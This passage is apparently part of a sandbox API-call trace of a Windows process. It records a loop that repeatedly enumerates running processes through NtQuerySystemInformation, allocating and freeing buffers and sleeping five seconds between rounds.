SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.759] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.827] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.856] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.900] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.909] 